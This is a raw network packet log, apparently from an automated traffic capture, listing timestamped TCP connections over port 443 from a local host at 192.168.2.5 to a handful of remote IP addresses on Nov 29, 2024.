                                                                                                                            Nov 29, 2024 08:30:52.335846901 CET4434975013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.335925102 CET4434975013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.335983038 CET49750443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.336008072 CET4434974913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.336091995 CET4434974913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.336183071 CET49749443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.336226940 CET49750443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.336246967 CET4434975013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.336260080 CET49750443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.336265087 CET4434975013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.338103056 CET49749443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.338124990 CET4434974913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.338179111 CET49749443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.338186026 CET4434974913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.340884924 CET49759443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.340924978 CET4434975913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.341625929 CET49759443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.342022896 CET49759443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.342031956 CET4434975913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.342134953 CET49760443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.342175961 CET4434976013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.342489958 CET49760443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.342619896 CET49760443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.342633009 CET4434976013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.359447956 CET4434975113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.359586000 CET4434975113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.359786034 CET49751443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.359934092 CET49751443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.359955072 CET4434975113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.359968901 CET49751443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.359976053 CET4434975113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.362366915 CET49761443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.362401009 CET4434976113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.362525940 CET49761443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.362698078 CET49761443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.362706900 CET4434976113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.394407034 CET4434975213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.394470930 CET4434975213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.394666910 CET49752443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.394771099 CET49752443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.394788980 CET4434975213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.394799948 CET49752443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.394805908 CET4434975213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.397427082 CET49762443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.397475958 CET4434976213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.397627115 CET49762443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.397629976 CET4434975313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.397687912 CET4434975313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.397735119 CET49753443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.397774935 CET49762443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.397784948 CET4434976213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.397949934 CET49753443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.397963047 CET4434975313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.397972107 CET49753443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.397975922 CET4434975313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.400129080 CET49763443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.400151014 CET4434976313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.400238037 CET49763443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.400333881 CET49763443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:52.400346994 CET4434976313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.716094971 CET44349755104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.716156960 CET44349755104.21.75.170192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:52.716352940 CET49755443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:30:52.716701031 CET49755443192.168.2.5104.21.75.170
                                                                                                                            Nov 29, 2024 08:30:53.871020079 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:53.871082067 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:53.871171951 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:53.871345997 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:53.871356010 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.077339888 CET4434976113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.115596056 CET49761443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.115612030 CET4434976113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.116089106 CET4434976313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.117974043 CET49761443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.117979050 CET4434976113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.123682022 CET4434976013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.124279022 CET49760443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.124310017 CET4434976013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.124933004 CET49760443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.124939919 CET4434976013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.161294937 CET49763443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.161317110 CET4434976313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.162441015 CET49763443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.162446022 CET4434976313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.241926908 CET4434976213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.447338104 CET4434976213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.448165894 CET49762443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.483268023 CET49762443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.483292103 CET4434976213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.483890057 CET49762443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.483900070 CET4434976213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.514672995 CET4434976113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.514749050 CET4434976113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.516582966 CET49761443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.540519953 CET49761443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.540548086 CET4434976113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.540658951 CET49761443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.540669918 CET4434976113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.551034927 CET4434976313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.551119089 CET4434976313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.552525997 CET49763443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.567967892 CET4434976013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.568042994 CET4434976013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.568118095 CET49760443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.578110933 CET49763443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.578139067 CET4434976313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.583329916 CET49760443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.583357096 CET4434976013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.583369970 CET49760443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.583376884 CET4434976013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.589296103 CET49766443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.589333057 CET4434976613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.589400053 CET49766443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.590421915 CET49766443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.590440035 CET4434976613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.591711044 CET49767443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.591747046 CET4434976713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.591851950 CET49767443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.592005968 CET49767443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.592020035 CET4434976713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.593708992 CET49768443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.593739986 CET4434976813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.593833923 CET49768443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.593990088 CET49768443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.594002962 CET4434976813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.819591999 CET4434976213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.819667101 CET4434976213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.820095062 CET49762443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.821702003 CET49762443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.821732044 CET4434976213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.821743965 CET49762443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.821759939 CET4434976213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.824757099 CET49769443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.824803114 CET4434976913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.824913025 CET49769443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.825155020 CET49769443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:54.825170040 CET4434976913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.911355972 CET49770443192.168.2.596.17.64.171
                                                                                                                            Nov 29, 2024 08:30:54.911396980 CET4434977096.17.64.171192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:54.911479950 CET49770443192.168.2.596.17.64.171
                                                                                                                            Nov 29, 2024 08:30:54.911732912 CET49770443192.168.2.596.17.64.171
                                                                                                                            Nov 29, 2024 08:30:54.911752939 CET4434977096.17.64.171192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:55.338939905 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:55.339219093 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:55.339237928 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:55.340456009 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:55.340528965 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:55.340543985 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:55.340579987 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:55.340930939 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:55.340996981 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:55.341098070 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:55.341109991 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:55.467962980 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:55.851537943 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:55.851562977 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:55.851588011 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:55.851639032 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:55.851651907 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:55.851691961 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:55.859935045 CET49765443192.168.2.552.6.155.20
                                                                                                                            Nov 29, 2024 08:30:55.859961987 CET4434976552.6.155.20192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.248758078 CET4434975913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.249277115 CET49759443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.249330997 CET4434975913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.249725103 CET49759443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.249743938 CET4434975913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.309432030 CET4434976613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.309988976 CET49766443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.310005903 CET4434976613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.310426950 CET49766443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.310434103 CET4434976613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.311410904 CET4434976813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.311820030 CET49768443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.311842918 CET4434976813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.312290907 CET49768443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.312299967 CET4434976813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.373444080 CET4434976713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.375113964 CET49767443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.375144005 CET4434976713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.375842094 CET49767443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.375849962 CET4434976713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.443509102 CET4434977096.17.64.171192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.443809032 CET49770443192.168.2.596.17.64.171
                                                                                                                            Nov 29, 2024 08:30:56.443834066 CET4434977096.17.64.171192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.447457075 CET4434977096.17.64.171192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.447527885 CET49770443192.168.2.596.17.64.171
                                                                                                                            Nov 29, 2024 08:30:56.453273058 CET49770443192.168.2.596.17.64.171
                                                                                                                            Nov 29, 2024 08:30:56.453361988 CET4434977096.17.64.171192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.453464985 CET49770443192.168.2.596.17.64.171
                                                                                                                            Nov 29, 2024 08:30:56.453473091 CET4434977096.17.64.171192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.499166965 CET49770443192.168.2.596.17.64.171
                                                                                                                            Nov 29, 2024 08:30:56.611169100 CET4434976913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.615377903 CET49769443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.615401030 CET4434976913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.615850925 CET49769443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.615854979 CET4434976913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.683388948 CET4434975913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.683465958 CET4434975913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.683512926 CET49759443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.684021950 CET49759443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.684042931 CET4434975913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.684053898 CET49759443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.684060097 CET4434975913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.711859941 CET49771443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.711884975 CET4434977113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.711962938 CET49771443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.719667912 CET49771443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.719680071 CET4434977113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.744434118 CET4434976613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.744520903 CET4434976613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.744579077 CET49766443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.745923042 CET49766443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.745948076 CET4434976613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.745958090 CET49766443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.745963097 CET4434976613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.746130943 CET4434976813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.746195078 CET4434976813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.746248007 CET49768443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.746356964 CET49768443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.746376038 CET4434976813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.770610094 CET4434977096.17.64.171192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.770718098 CET4434977096.17.64.171192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.770802021 CET49770443192.168.2.596.17.64.171
                                                                                                                            Nov 29, 2024 08:30:56.772936106 CET49772443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.772984028 CET4434977213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.773036957 CET49772443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.778055906 CET49770443192.168.2.596.17.64.171
                                                                                                                            Nov 29, 2024 08:30:56.778083086 CET4434977096.17.64.171192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.817437887 CET4434976713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.817509890 CET4434976713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.817590952 CET49767443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.823295116 CET49772443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.823338032 CET4434977213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.855989933 CET49767443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.856029987 CET4434976713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.856045961 CET49767443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.856051922 CET4434976713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.857178926 CET49773443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:56.857224941 CET4434977313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:56.857285023 CET49773443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:57.057039022 CET4434976913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:57.057117939 CET4434976913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:57.057198048 CET49769443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:57.147041082 CET49773443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:57.147068977 CET4434977313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:57.184428930 CET49769443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:57.184428930 CET49769443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:57.184467077 CET4434976913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:57.184479952 CET4434976913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:57.200319052 CET49774443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:57.200373888 CET4434977413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:57.200436115 CET49774443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:57.207777977 CET49775443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:57.207839012 CET4434977513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:57.207912922 CET49775443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:57.208446026 CET49774443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:57.208482027 CET4434977413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:57.209690094 CET49775443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:57.209714890 CET4434977513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.562727928 CET4434977213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.565112114 CET49772443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:58.565135002 CET4434977213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.565643072 CET49772443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:58.565649033 CET4434977213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.589807987 CET4434977113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.590315104 CET49771443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:58.590337992 CET4434977113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.590787888 CET49771443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:58.590792894 CET4434977113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.959945917 CET4434977313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.961945057 CET49773443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:58.961973906 CET4434977313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.964111090 CET49773443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:58.964132071 CET4434977313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.977974892 CET4434977413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.978427887 CET49774443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:58.978466988 CET4434977413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.978844881 CET49774443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:58.978849888 CET4434977413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.996797085 CET4434977213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.996965885 CET4434977213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.997147083 CET49772443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:58.997184992 CET49772443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:58.997204065 CET4434977213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:58.997214079 CET49772443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:58.997220039 CET4434977213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.000005007 CET49776443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.000057936 CET4434977613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.000157118 CET49776443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.000283003 CET49776443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.000293016 CET4434977613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.023782969 CET4434977513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.024287939 CET49775443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.024327993 CET4434977513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.024730921 CET49775443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.024735928 CET4434977513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.042500973 CET4434977113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.042577028 CET4434977113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.042634010 CET49771443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.042871952 CET49771443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.042897940 CET4434977113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.042912960 CET49771443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.042917967 CET4434977113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.048301935 CET49777443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.048346043 CET4434977713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.048410892 CET49777443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.048616886 CET49777443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.048630953 CET4434977713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.402585983 CET4434977313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.402678013 CET4434977313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.402894974 CET49773443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.403168917 CET49773443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:30:59.403189898 CET4434977313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:30:59.403199911 CET49773443192.168.2.513.107.246.63
